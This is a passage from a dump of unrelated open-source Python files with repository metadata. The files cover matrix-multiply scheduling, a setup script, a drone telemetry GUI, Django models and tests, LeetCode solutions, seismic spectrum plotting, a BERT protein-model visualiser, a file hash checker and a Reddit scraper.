up into cases\n p = divide_loop(p, \"j\", N_REG_BLK, [\"jo\", \"ji\"], tail=\"cut_and_guard\")\n p = divide_loop(p, \"i\", M_REG_BLK, [\"io\", \"ii\"], tail=\"cut_and_guard\")\n p = fission(p, p.find(\"for jo in _: _ #0\").after(), n_lifts=2)\n p = reorder_loops(p, \"ii jo #0\")\n p = fission(p, p.find(\"for io in _: _\").after())\n p = fission(p, p.find(\"for io in _: _ #1\").after())\n p = reorder_loops(p, \"k io #0\")\n p = reorder_loops(p, \"k jo #0\")\n p = lift_if(p, \"if N % 64 > 0: _ #0\", n_lifts=3)\n p = reorder_loops(p, \"k io\")\n p = lift_if(p, \"if M % 6 > 0: _ #0\")\n p = fission(p, p.find(\"for jo in _: _ #1\").after(), n_lifts=2)\n p = reorder_loops(p, \"ii jo\")\n p = reorder_loops(p, \"k jo\")\n p = lift_if(p, \"if N % 64 > 0: _ #1\", n_lifts=2)\n # Main block\n p = replace_all(p, basic_kernel_Mx4[6])\n p = call_eqv(p, basic_kernel_Mx4[6], sgemm_kernel_avx512_Mx4[6])\n # Right panel\n p = replace_all(p, right_panel_kernel)\n p = call_eqv(p, right_panel_kernel, right_panel_kernel_scheduled)\n # Bottom panel\n p = replace_all(p, bottom_panel_kernel)\n p = call_eqv(p, bottom_panel_kernel, bottom_panel_kernel_scheduled)\n ## TODO: bottom-right tile\n p = simplify(p)\n return p\n\n\nsgemm_above_kernel = make_sgemm_above_kernel()\n\n\ndef make_sgemm_exo(p=SGEMM):\n p = rename(p, \"sgemm_exo\")\n # Split all loops\n p = divide_loop(p, \"k\", K_L1_BLK, [\"ko\", \"ki\"], tail=\"cut_and_guard\")\n p = repeat(divide_loop)(p, \"i\", M_L1_BLK, [\"io\", \"ii\"], tail=\"cut_and_guard\")\n p = repeat(divide_loop)(p, \"j\", N_L1_BLK, [\"jo\", \"ji\"], tail=\"cut_and_guard\")\n # Explode into 8 cases\n for i in range(0, 2):\n p = fission(p, p.find(f\"for io in _:_ #{i}\").after(), n_lifts=2)\n for i in range(0, 4):\n p = fission(p, p.find(f\"for jo in _:_ #{i}\").after(), n_lifts=4)\n # Case 1:\n p = repeat(reorder_loops)(p, \"ki io\")\n p = repeat(reorder_loops)(p, \"ii jo\")\n p = repeat(reorder_loops)(p, \"ki jo\")\n p = replace(p, \"for ki in _: _ #0\", SGEMM_WINDOW)\n # Case 2:\n p = lift_if(p, \"if N%64 > 0: _ #0\", n_lifts=4)\n p = replace(p, \"for ki in _: _ #0\", SGEMM_WINDOW)\n # Case 3:\n p = lift_if(p, \"if M%264 > 0: _ #0\", n_lifts=2)\n p = repeat(reorder_loops)(p, \"ki jo\")\n p = replace(p, \"for ki in _: _ #0\", SGEMM_WINDOW)\n # Case 4:\n p = lift_if(p, \"if M%264 > 0: _ #1\", n_lifts=2)\n p = lift_if(p, \"if N%64 > 0: _ #1\", n_lifts=3)\n p = replace(p, \"for ki in _: _ #0\", SGEMM_WINDOW)\n # Case 5:\n p = replace(p, \"for ki in _: _ #0\", SGEMM_WINDOW)\n # Case 6:\n p = lift_if(p, \"if N%64 > 0: _ #2\", n_lifts=3)\n p = replace(p, \"for ki in _: _ #0\", SGEMM_WINDOW)\n # Case 7:\n p = lift_if(p, \"if M%264 > 0: _ #2\")\n p = repeat(reorder_loops)(p, \"ki jo\")\n p = replace(p, \"for ki in _: _ #0\", SGEMM_WINDOW)\n # Case 8:\n p = lift_if(p, \"if M%264 > 0: _ #3\")\n p = lift_if(p, \"if N%64 > 0: _ #3\", n_lifts=2)\n p = replace(p, \"for ki in _: _ #0\", SGEMM_WINDOW)\n ##\n ## Case 1 memory staging\n p = stage_window(p, \"A[_] #0\", \"A1_cache\", DRAM_STATIC)\n p = stage_window(p, \"B[_] #0\", \"B1_cache\", DRAM_STATIC)\n p = autolift_alloc(p, \"A1_cache : _\", n_lifts=3)\n p = autolift_alloc(p, \"B1_cache : _\", n_lifts=3)\n p = autofission(p, p.find_loop(\"i0 #0\").after())\n ### Case 2 memory staging\n p = stage_window(p, \"B[_] #1\", \"B2_cache\", DRAM_STATIC)\n p = bound_alloc(p, \"B2_cache\", [None, \"64\"], unsafe_disable_checks=True)\n p = lift_alloc(p, \"B2_cache\")\n p = autofission(p, p.find_loop(\"i0 #2\").after())\n ## Case 3 memory staging\n p = stage_window(p, \"B[_] #2\", \"B3_cache\", DRAM_STATIC)\n ## Case 4 memory staging\n p = stage_window(p, \"B[_] #3\", \"B4_cache\", DRAM_STATIC)\n p = bound_alloc(p, \"B4_cache\", [None, \"64\"], unsafe_disable_checks=True)\n ## Case 5 memory staging\n p = stage_window(p, \"B[_] #4\", \"B5_cache\", DRAM_STATIC)\n p = bound_alloc(p, \"B5_cache\", [\"512\", None], unsafe_disable_checks=True)\n ## Case 6 memory staging\n p = stage_window(p, \"B[_] #5\", \"B6_cache\", DRAM_STATIC)\n p = bound_alloc(p, \"B6_cache\", [\"512\", \"64\"], unsafe_disable_checks=True)\n ## Case 7 memory staging\n p = stage_window(p, \"B[_] #6\", \"B7_cache\", DRAM_STATIC)\n p = bound_alloc(p, \"B7_cache\", [\"512\", None], unsafe_disable_checks=True)\n ## Case 8 memory staging\n p = stage_window(p, \"B[_] #7\", \"B8_cache\", DRAM_STATIC)\n p = bound_alloc(p, \"B8_cache\", [\"512\", \"64\"], unsafe_disable_checks=True)\n ## Replace SGEMM_WINDOW with optimized form\n # These must come AFTER bound_alloc since the internal check-effects\n # is a whole program analysis that is VERY expensive\n p = repeat(call_eqv)(p, SGEMM_WINDOW, sgemm_above_kernel)\n # Clean up\n p = simplify(p)\n return p\n\n\nsgemm_exo = make_sgemm_exo()\n\nif __name__ == \"__main__\":\n # print(sgemm_above_kernel)\n print(sgemm_exo)\n\n__all__ = [\"sgemm_exo\"]\n","repo_name":"exo-lang/exo","sub_path":"apps/x86/sgemm/sgemm.py","file_name":"sgemm.py","file_ext":"py","file_size_in_byte":12195,"program_lang":"python","lang":"en","doc_type":"code","stars":248,"dataset":"github-code","pt":"53"} +{"seq_id":"35123966225","text":"from distutils.core import setup\nfrom setuptools import find_packages\n\nVERSION = '0.9.1'\n\nsetup(\n name='homematicip',\n packages=find_packages(exclude='tests'),\n version=VERSION,\n description='An API for the homematicip cloud',\n author='Heimo Stieg',\n author_email='stieg@corona-bytes.net',\n url='https://github.com/coreGreenberet/homematicip-rest-api',\n download_url='https://github.com/coreGreenberet/homematicip-rest-api/tarball/' + VERSION,\n keywords=['homematicip'], # arbitrary keywords\n classifiers=['Development Status :: 4 - Beta', 'Programming Language :: Python :: 3 :: Only'],\n install_requires=[\"requests\", \"websocket-client\", \"future\", \"websockets\", \"aiohttp\"],\n scripts=['hmip_cli.py', 'hmip_generate_auth_token.py']\n)\n","repo_name":"acaporrini/homematicip-rest-api","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"69808885289","text":"import tkinter as tk\r\nimport laptopR\r\nimport laptopS\r\nimport threading\r\nimport KeybourdD\r\n\r\nroot = tk.Tk()\r\nroot.title(\"Simple GUI\")\r\nroot.geometry(\"1280x720\")\r\nroot.configure(bg=\"#1F1F1F\")\r\n\r\n\r\n\r\n\r\nthreading.Thread(target=laptopR.main).start()\r\nthreading.Thread(target=KeybourdD.main).start()\r\nthreading.Thread(target=laptopS.main).start()\r\n\r\ndef Update():\r\n if laptopR.MessageContent != []:\r\n angle_x.delete(0, \"end\")\r\n angle_y.delete(0, \"end\")\r\n Yaw_z.delete(0, \"end\")\r\n angle_x.insert(0,laptopR.MessageContent[0])\r\n angle_y.insert(0,laptopR.MessageContent[1])\r\n Yaw_z.insert(0,laptopR.MessageContent[2])\r\n laptopS.message = KeybourdD.message\r\n root.after(15, Update)\r\n\r\n\r\n\r\nip = tk.Entry(root,font=100)\r\nip.insert(0, \"192.168.1.171\")\r\nip.config(state=\"readonly\")\r\nip.place(x=500,y=10)\r\n\r\n\r\n\r\n\r\n\r\n\r\n#message shower\r\nangle_x = tk.Entry(root,font=15,width=5)\r\nangle_x.place(x=500,y=500)\r\nangle_y = tk.Entry(root,font=15,width=5)\r\nangle_y.place(x=560,y=500)\r\nYaw_z = tk.Entry(root,font=15,width=5)\r\nYaw_z.place(x=620,y=500)\r\n#message sender\r\n\r\n\r\n\r\nroot.after(15, Update)\r\nroot.mainloop()","repo_name":"WaseemALTamer/UAV-Python","sub_path":"Laptop/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37999756394","text":"from system.core.model import Model\n\nclass Product(Model):\n def __init__(self):\n super(Product, self).__init__()\n\n def add_item(self, info):\n query = \"INSERT INTO products(name, description, price, created_on, updated_on) VALUES(:name, :description, :price, now(), now())\"\n data = {\n 'name': info['name'],\n 'description': info['description'],\n 'price': info['price']\n }\n self.db.query_db(query, data)\n\n def get_all_items(self):\n query = \"SELECT id, name, description, price FROM products\"\n return self.db.query_db(query)\n\n def get_one_item(self, info):\n query = \"SELECT id, name, description, price FROM products WHERE id = :id\"\n data = {\n 'id': info\n }\n return self.db.query_db(query, data)\n\n def update_item(self, info):\n query = \"UPDATE products SET name = :name, description = :description, price = :price, updated_on = now() WHERE id = :id\"\n data = {\n 'name': info['name'],\n 'description': info['description'],\n 'price': info['price'],\n 'id': info['id']\n }\n self.db.query_db(query, data)\n\n def delete_item(self, info):\n query = \"DELETE FROM products WHERE id = :id\"\n data = {\n 'id': info['id']\n }\n return self.db.query_db(query, data)","repo_name":"jbenammi/Pylot-SemiRestful","sub_path":"app/models/Product.py","file_name":"Product.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8690592349","text":"from typing import List\nclass Solution:\n def maxSubarraySumCircular(self, A: List[int]) -> int:\n local_max = 0\n local_min = 0\n glob_max = min(A)\n glob_min = min(A)\n for i in range(len(A)):\n if A[i] < A[i] + local_max:\n local_max += A[i]\n else:\n local_max = A[i]\n if A[i] < A[i] + local_min:\n local_min = A[i]\n else:\n local_min += A[i]\n if glob_max < local_max:\n glob_max = local_max\n if glob_min > local_min:\n glob_min = local_min\n print(glob_max, glob_min)\n if sum(A) == glob_min:\n return glob_max\n return glob_max if glob_max > sum(A) - glob_min else sum(A) - glob_min\n ","repo_name":"nailerHeum/ps_dir","sub_path":"leetcode/maximum_sum_circular_subarray.py","file_name":"maximum_sum_circular_subarray.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21530696717","text":"#!/usr/bin/env python\nfrom obspy.core import UTCDateTime, read, Stream\nimport matplotlib.pyplot as plt\nfrom scipy.signal import periodogram\nimport numpy as np\nimport math\nfrom obspy.clients.fdsn import Client\nfrom scipy import signal\n\nimport matplotlib as mpl\nmpl.rc('font', family='serif')\nmpl.rc('font', serif='Times')\nmpl.rc('text', usetex=True)\nmpl.rc('font', size=18)\n\n\n\nmf, Mf = 2, 6\nhours = 26\nstime = UTCDateTime(UTCDateTime('2022-01-15T04:14:00'))\n\n\nst = read('./tonga_bp.mseed')\n\n\nst.detrend('linear')\nst.merge(fill_value=0)\nst.trim(stime,stime+hours*60*60)\nfor tr in st:\n tr.data *= 100\n\n\nfig, ax = plt.subplots(2, 1, figsize=(16, 12))\nax = ax.flatten()\nst2 = st.copy()\n\n\n# filter between 2.5 and 5 mHz\nst2.filter('bandpass', freqmin=1/400, freqmax=1/200)\nax[0].plot(st2[0].times()/(60*60), st2[0].data,\n alpha=0.5, color='C0', label='AGBOM TONGA')\n\n\nf_mHz = 3.68\n\ndays = 1.5\nwo = 2*np.pi*(f_mHz/1000.)\nAo = np.max(st2[0].data)/2.\nQ_True = 117\n\n#t = np.arange(0,24*days*3600.)\nt = st2[0].times()\n\nSynthetic = Ao*np.exp((-wo*t)/(2*Q_True))*np.sin(wo*t)\n\n\nax[0].plot(st2[0].times()/(60*60), Synthetic,\n alpha=0.5, color='C8', label='Synthetic Q=117')\nax[0].set_ylabel('Pressure (Pa)')\nax[0].set_xlabel('Time (hr.)')\nax[0].set_xlim((min(st2[0].times()/(60*60)), max(st2[0].times()/(60*60))))\nax[0].legend(loc='upper right', ncol=2)\n\n\n# Window\nfor tr in st:\n tr.data *= signal.get_window(('kaiser', 2. * np.pi), tr.stats.npts)\n\nNFFT = 2 ** (math.ceil(math.log(st[0].stats.npts, 2)))\nprint('Window Length is:', NFFT)\n\n\nfor idx, tr in enumerate(st):\n\n f, p = periodogram(tr.data, fs=tr.stats.sampling_rate,\n nfft=NFFT, scaling='spectrum')\n p, f = p[1:], f[1:]\n\n # Now have p in nm/s/s switch f to mHz\n f *= 1000.\n p = p[(f >= mf) & (f <= Mf)]\n f = f[(f >= mf) & (f <= Mf)]\n if idx == 0:\n ln1 = ax[1].plot(f, p, label='AGBOM TONGA',\n alpha=0.3, color='C0')\n ax[1].fill_between(f, 0, p, alpha=0.7)\n ax[1].set_xlim((mf, Mf))\n ax[1].set_ylabel('Amplitude (Pa)')\n #ax[1].tick_params(axis='y')\n ax[1].set_xlabel('Frequency (mHz)')\n ax[1].set_ylim((0, 1.1*max(p)))\n else:\n ax2 = ax[1].twinx()\n ln2 = ax2.plot(f, p, label='AGBOM TONGA',\n alpha=0.3, color='C5')\n ax2.fill_between(f, 0, p, alpha=0.7, color='C5')\n ax2.set_ylabel('Amplitude ($\\mu m/s)$', color='C5')\n ax2.tick_params(axis='y', labelcolor='C5')\n ax2.set_ylim((0, 1.1*max(p)))\n\n# Modes from PREM calculated by MINEOS\nax[1].plot([3.68, 3.68], [-1, 40], color='C1', alpha=0.7)\nax[1].plot([4.40, 4.40], [-1, 40], color='C2', alpha=0.7)\nax[1].plot([3.63, 3.63], [-1, 40], color='C3', alpha=0.7)\nax[1].plot([3.72, 3.72], [-1, 40], color='C4', alpha=0.7)\n\n\nax[1].text(3.68, 0.3, '$_0S_{28} - _0S_{29}$',\n color='C1', alpha=0.7, ha='center', fontsize=22)\nax[1].text(4.40, 0.3, '$_0S_{36} - _0S_{37}$',\n color='C2', alpha=0.7, ha='center', fontsize=22)\nax[1].text(3.53, .25, '$_0S_{28}$', color='C3',\n alpha=0.7, ha='center', fontsize=22)\nax[1].text(3.82, .25, '$_0S_{29}$', color='C4',\n alpha=0.7, ha='center', fontsize=22)\nax[1].text(1.62, 0.3, '(b)')\nax[0].text(-2.5, 410, '(a)')\n\nplt.savefig('Figure10.PNG', format='PNG', dpi=400)\nplt.savefig('Figure10.PDF', format='PDF', dpi=400)\n\n#plt.show()\n","repo_name":"aringler-usgs/tonga_paper","sub_path":"figure10.py","file_name":"figure10.py","file_ext":"py","file_size_in_byte":3411,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"70243300649","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Apr 25 21:28:56 2021\n\n@author: hungd\n\"\"\"\n\ndef mergeOverlappingIntervals(intervals):\n # Write your code here.\n \n intervals = sorted(intervals, key=lambda x: x[0])\n overlappingIntervals = [intervals[0]]\n for i in range(1, len(intervals)):\n \tif intervals[i][0] <= overlappingIntervals[-1][1]:\n \t\toverlappingIntervals[-1][1] = max(intervals[i][1], overlappingIntervals[-1][1])\n \telse:\n \t\toverlappingIntervals.append(intervals[i])\n return overlappingIntervals\n\nintervals = [\n [2, 3],\n [4, 5],\n [6, 7],\n [8, 9],\n [1, 10]\n ]\nmergeOverlappingIntervals(intervals)\n","repo_name":"hungdoan888/algo_expert","sub_path":"overlappingIntervals.py","file_name":"overlappingIntervals.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"37067520817","text":"class Parent:\n # self 인자가 없을 경우, 인스턴스 생성 시에 사용할 수 없다\n def function1():\n print('non self function called!')\n\n def function2(self):\n print('self function called!')\n\n\nParent.function1()\n\nParent().function2()\n\nprint()\nprint()\n\n\nclass Foo():\n bar = 'A'\n\n def __init__(self):\n self.bar = 'B'\n\n class Bar():\n bar = 'C'\n\n def __init__(self):\n self.bar = 'D'\n\n\nprint(Foo.bar)\nprint(Foo().bar)\nprint(Foo.Bar.bar)\nprint(Foo.Bar().bar)\n","repo_name":"junh0328/prepare_algorithm","sub_path":"python_basic/quiz2_4.py","file_name":"quiz2_4.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39545998047","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('product', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Stock',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('stock', models.IntegerField()),\n ('product', models.ForeignKey(to='product.Product')),\n ],\n ),\n migrations.CreateModel(\n name='Warehouse',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(default=b'Default', unique=True, max_length=100)),\n ],\n ),\n migrations.AddField(\n model_name='stock',\n name='warehouse',\n field=models.ForeignKey(to='stock.Warehouse'),\n ),\n ]\n","repo_name":"marcuslind90/lindshop","sub_path":"core/stock/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14742936328","text":"\"\"\"\nUma classe vai se relacionar com a outra, mas elas continuam sendo independentes.\nExemplo: Um escritor e uma caneta e uma máquina de escrever\nRelacionar essas três classes.\n\n\"\"\"\nfrom classe import Escritor\nfrom classe import Caneta\nfrom classe import MaquinaDeEscrever\nescritor = Escritor('Joãozinho')\ncaneta = Caneta('Bic')\nmaquina = MaquinaDeEscrever()\nprint(escritor.nome)\nprint(caneta.marca)\nmaquina.escrever()\n# Criando uma associacao\nescritor.ferramenta = caneta\nescritor.ferramenta.escrever()\n\n","repo_name":"eliasantoniorodrigues1/POO_python","sub_path":"associacao.py","file_name":"associacao.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16392339423","text":"import os\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom data import DatasetSeq, DatasetInterDomain, DatasetPDB\nfrom model import BERTLM, BERT\nfrom trainer import BERTTrainer\nimport options\nfrom torch.utils.data import DataLoader, DistributedSampler, RandomSampler\nfrom torch import distributed\nfrom torch.utils.tensorboard import SummaryWriter\nimport matplotlib.pyplot as pl\n\n\ndef load_dataset(args):\n if args.task == 'pfam':\n train_data_path = args.train_dataset\n print(\"Loading Train Dataset\", train_data_path)\n train_dataset = DatasetSeq(train_data_path, seq_len=args.seq_len, seq_mode=args.seq_mode,\n relative_3d=args.relative_3d,\n relative_3d_size=10, relative_3d_step=2)\n else:\n raise ValueError('unknown task name')\n\n return train_dataset\n\n\nparser = options.get_training_parser()\nargs = options.parse_args_and_arch(parser)\n\n\n# GPU mode: 0 - 1 gpu, 1 -- 1 Node, 2 -- multi Nodes\ngpu_mode = 1\nif not torch.cuda.is_available():\n gpu_mode = 0\n\nif (gpu_mode == 1) & torch.cuda.is_available():\n device = torch.device(\"cuda:0\")\nelse:\n device = torch.device(\"cpu\")\n\n\ntrain_dataset = load_dataset(args)\n\nprint(\"Creating Dataloader\")\n\n# datasampler = RandomSampler(train_dataset)\n# train_data_loader = DataLoader(train_dataset, batch_size=args.batch_size,\n# num_workers=args.num_workers, sampler=datasampler)\n\n# build model\nprint(\"Building BERT model\")\nmodel = BERT(len(train_dataset.vocab),\n hidden=args.hidden, n_layers=args.layers, attn_heads=args.attn_heads,\n seq_mode=args.seq_mode,\n abs_position_embed=args.abs_position_embed,\n relative_attn=args.relative_attn,\n relative_1d=args.relative_1d,\n max_relative_1d_positions=10,\n relative_3d=args.relative_3d,\n relative_3d_vocab_size=len(train_dataset.vocab_3d),\n visual=True)\n\nif args.restart:\n print(\"reload pretrained BERT model\")\n model.load_state_dict(torch.load(args.restart_file, map_location=torch.device('cpu')))\n\nmodel.to(device)\n\ntorch.set_grad_enabled(False)\n\nprint(model.visual)\n\nitem = 2\ndata = train_dataset[item]\n\ndata = {key: value.unsqueeze(0).to(device) for key, value in data.items()}\n\nx, output = model.forward(data[\"bert_input\"], distance_matrix=data[\"dist_mat\"])\n\n\nfor param in model.embedding.token.parameters():\n eb_vec = param\n\nfor att in output['attention']:\n pl.figure()\n pl.imshow(att[0].numpy()[2])\n pl.colorbar()\n\npl.figure()\npl.imshow(x[0].numpy())\npl.colorbar()\n\n\n","repo_name":"lahplover/unippi","sub_path":"visual_bert.py","file_name":"visual_bert.py","file_ext":"py","file_size_in_byte":2629,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"20401711784","text":"import sys\nimport os\nimport django\n\nBASE = os.path.dirname(__file__)\nROOT = os.path.abspath(\n os.path.join(\n BASE,\n \"../src\"\n )\n)\n\n\nsys.path.insert(0, ROOT)\nos.environ[\"DJANGO_SETTINGS_MODULE\"] = \"main.settings\"\ndjango.setup()\n","repo_name":"biplobe6/initial_task","sub_path":"live-editor/add_root.py","file_name":"add_root.py","file_ext":"py","file_size_in_byte":248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31277973590","text":"import hashlib\nimport sys\n\ndef criar_hash():\n\tnome_arquivo = input(\"\\nInforme o nome do arquivo: \")\n\tler_arquivo = open(nome_arquivo, 'rb').read()\n\thash_md5 = hashlib.md5(ler_arquivo)\n\tglobal hash_arquivo \n\thash_arquivo = hash_md5.hexdigest()\n\tprint(\"\\nHash do arquivo: \", hash_arquivo)\n\treturn hash_arquivo\n\ncriar_hash()\n\ndef verificar_integridade(hash_arquivo):\n\thash_antigo = hash_arquivo\n\thash_atual = criar_hash()\n\tif(hash_antigo == hash_atual):\n\t\tprint(\"\\nO arquivo está íntegro.\")\n\telse: print(\"\\nO conteúdo do arquivo foi modificado!\")\n\ndef menu():\n\topcao = input(\n \"\\nEsoclha uma opção:\\n\\n1 - Verificar a integridade do arquivo\\n2 - Sair\\n\\n\")\n\n\tif(opcao == \"1\"):\n\t\tverificar_integridade(hash_arquivo)\n\t\tmenu()\n\n\tif(opcao == \"2\" or opcao != \"1\"):\n\t\tsys.exit()\n\nmenu()\n","repo_name":"lucas-leoni/Tpi-Seguranca","sub_path":"hash.py","file_name":"hash.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4223301323","text":"from abc import ABC, abstractmethod\nfrom argparse import ArgumentParser, Namespace\nfrom typing import List\n\n\nclass BaseParser(ABC):\n @property\n @abstractmethod\n def description(self) -> str:\n ...\n\n @property\n @abstractmethod\n def aliases(self) -> List[str]:\n ...\n\n def __init__(self, subparser):\n name, *aliases = self.aliases\n self._argparser: ArgumentParser = subparser.add_parser(\n name, aliases=aliases, help=self.description\n )\n self._argparser.set_defaults(func=self.parse)\n\n @abstractmethod\n def parse(self, args: Namespace) -> None:\n ...\n","repo_name":"ParsaAlizadeh/universal-parser-tool","sub_path":"upt/baseparser.py","file_name":"baseparser.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"} +{"seq_id":"16639757657","text":"import boto\nfrom boto.ec2.cloudwatch.alarm import MetricAlarm\nimport sure # noqa\n\nfrom moto import mock_cloudwatch\n\n\n@mock_cloudwatch\ndef test_create_alarm():\n conn = boto.connect_cloudwatch()\n\n alarm = MetricAlarm(\n name='tester',\n comparison='>=',\n threshold=2.0,\n period=60,\n evaluation_periods=5,\n statistic='Average',\n description='A test',\n dimensions={'InstanceId': ['i-0123456,i-0123457']},\n alarm_actions=['arn:alarm'],\n ok_actions=['arn:ok'],\n insufficient_data_actions=['arn:insufficient'],\n unit='Seconds',\n )\n conn.create_alarm(alarm)\n\n alarms = conn.describe_alarms()\n alarms.should.have.length_of(1)\n alarm = alarms[0]\n alarm.name.should.equal('tester')\n alarm.comparison.should.equal('>=')\n alarm.threshold.should.equal(2.0)\n alarm.period.should.equal(60)\n alarm.evaluation_periods.should.equal(5)\n alarm.statistic.should.equal('Average')\n alarm.description.should.equal('A test')\n dict(alarm.dimensions).should.equal({'InstanceId': ['i-0123456,i-0123457']})\n list(alarm.alarm_actions).should.equal(['arn:alarm'])\n list(alarm.ok_actions).should.equal(['arn:ok'])\n list(alarm.insufficient_data_actions).should.equal(['arn:insufficient'])\n alarm.unit.should.equal('Seconds')\n\n\n@mock_cloudwatch\ndef test_delete_alarm():\n conn = boto.connect_cloudwatch()\n\n alarm = MetricAlarm(\n name='tester',\n comparison='>=',\n threshold=2.0,\n period=60,\n evaluation_periods=5,\n statistic='Average',\n description='A test',\n dimensions={'InstanceId': ['i-0123456,i-0123457']},\n alarm_actions=['arn:alarm'],\n ok_actions=['arn:ok'],\n insufficient_data_actions=['arn:insufficient'],\n unit='Seconds',\n )\n conn.create_alarm(alarm)\n\n alarms = conn.describe_alarms()\n alarms.should.have.length_of(1)\n\n alarms[0].delete()\n\n alarms = conn.describe_alarms()\n alarms.should.have.length_of(0)\n","repo_name":"cameron-r/moto","sub_path":"tests/test_cloudwatch/test_cloudwatch.py","file_name":"test_cloudwatch.py","file_ext":"py","file_size_in_byte":2030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"24405830627","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Mar 7 19:23:59 2021\n\n@author: jonas\n\"\"\"\n\n# Get user input\nname = input(\"Enter your name: \")\nage_string = input(\"Enter your age: \")\n\ntry:\n # Convert the user input into an integer\n age = int(age_string)\n \nexcept ValueError:\n # Exit the program, because the user didn't enter the age as integer\n print(\"Your age must be an integer! Exiting the program.\")\n raise SystemExit\n \n# Greet the user.\nprint(f\"Hello, {name}. I heard your {age} years old.\")","repo_name":"AlreadyTakenJonas/pythonBootCamp2021","sub_path":"easyExercise_10_newHelloYou.py","file_name":"easyExercise_10_newHelloYou.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15664551853","text":"from django.urls import path\r\nimport django.conf.urls \r\nfrom . import views\r\n# from django.views.decorators.csrf import csrf_exempt\r\n\r\n\r\napp_name = 'turn'\r\nurlpatterns = [\r\n path('', views.index, name='index'),\r\n path('draw',views.draw, name = 'draw'),\r\n path('rotate',views.rotate, name = 'rotate'),\r\n path('no_prize',views.no_prize, name ='no_prize'),\r\n path('exist',views.exist, name = 'exist'),\r\n \r\n]\r\n","repo_name":"liuchelx/TurnTable","sub_path":"TurnTable/turn/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18159984148","text":"from django.test import Client, TestCase\n\nfrom main.tests.factories.user_factory import UserFactory\n\n\nclass UITestCase(TestCase):\n\n def three_perm_check(self, target, authorized_user, not_logged_in, logged_in, authorised):\n \"\"\"\n\n :param target: target url to request\n :param authorized_user: user that has permissions to access page\n :param not_logged_in: status code expected by not logged in user\n :param logged_in: status code expected by logged in user\n :param authorised: status code expected by an authorised user\n \"\"\"\n c = Client()\n response = c.get(target)\n self.assertEqual(response.status_code, not_logged_in)\n c.force_login(UserFactory())\n response = c.get(target)\n self.assertEqual(response.status_code, logged_in)\n c.force_login(authorized_user)\n response = c.get(target)\n self.assertEqual(response.status_code, authorised)\n","repo_name":"saty9/allez","sub_path":"ui/tests/ui_test_case.py","file_name":"ui_test_case.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24877713124","text":"from psaw import PushshiftAPI\nfrom tqdm import tqdm\n\n\ndef chunks(lst, n):\n \"\"\"Yield successive n-sized chunks from lst.\"\"\"\n for i in range(0, len(lst), n):\n yield lst[i:i + n]\n\ndef yield_content(search_func, prefix, **search_params):\n api_request_generator = search_func(**search_params)\n for content in api_request_generator:\n to_return = content.d_\n to_return['name'] = prefix + to_return['id']\n yield to_return\n\n\ndef scrape_pushshift(search_funcs, prefixes, **search_params):\n for search_func, prefix in zip(search_funcs, prefixes):\n for content in tqdm(yield_content(search_func, prefix, **search_params),\n 'scraping with ' + search_func.__name__):\n yield content\n\n\ndef rehydrate_content_pushshift(ids):\n comment_ids = list(filter(lambda x: x.startswith('t1_'), ids))\n submission_ids = list(filter(lambda x: x.startswith('t3_'), ids))\n api = PushshiftAPI()\n # need to chunkize because of:\n # NotImplementedError: When searching by ID, number of IDs must be\n # fewer than the max number of objects in a single request (1000).\n for chunk in chunks(submission_ids, 1000):\n for submission in yield_content(api.search_submissions, 't3_', ids=chunk):\n yield submission\n for chunk in chunks(comment_ids, 1000):\n for comment in yield_content(api.search_comments, 't1_', ids=chunk):\n yield comment\n\n\ndef rehydrate_parents_pushshift(things):\n parent_ids = set()\n for thing in things:\n if 'parent_id' in thing:\n parent_ids.add(thing['parent_id'])\n for parent in tqdm(rehydrate_content_pushshift(parent_ids),\n \"rehydrating parents\",\n 